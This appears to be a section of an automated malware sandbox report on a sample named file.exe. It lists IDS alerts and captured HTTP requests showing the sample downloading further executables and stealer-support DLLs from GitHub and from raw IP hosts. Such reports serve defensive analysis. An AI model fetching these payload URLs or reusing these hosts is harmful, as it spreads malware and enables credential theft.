Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50372 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50391 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50375 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50383 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50396 -> 172.67.180.113:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50387 -> 104.21.66.85:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50386 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50371 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50393 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50395 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:50401 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50325 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50400 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50207 -> 172.67.177.88:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50412 -> 172.67.180.113:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50328 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50413 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50214 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50422 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50418 -> 172.67.179.109:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50421 -> 172.67.180.113:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50430 -> 172.67.180.113:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50427 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50431 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:50435 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50438 -> 172.67.180.113:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50439 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50447 -> 172.67.180.113:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50453 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50448 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50459 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50466 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:50478 -> 185.215.113.16:80

Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.181.3
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.181.3
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.181.3
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.181.3
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.181.3
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00EAE0C0 recv,recv,recv,recv,

0_2_00EAE0C0

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlaHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlaHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: GET /Urijas/moperats/raw/refs/heads/main/jthjjdweajtujhjad.exe HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Urijas/moperats/refs/heads/main/jthjjdweajtujhjad.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/x3team/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/geopoxid/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/martin/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/unique3/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /hLfzXsaqNtoEGyaUtOMJ1734514745?argument=cp4z9SBCom0mjbAy1734599493 HTTP/1.1Host: home.fivetk5vt.topAccept: /
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /files/lolz/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /files/dodo/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/london/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Thu, 19 Dec 2024 08:27:33 GMTIf-None-Match: "6763d8f5-1b7e00"
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Thu, 19 Dec 2024 08:27:44 GMTIf-None-Match: "6763d900-2cb000"
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Thu, 19 Dec 2024 08:25:38 GMTIf-None-Match: "6763d882-ec400"
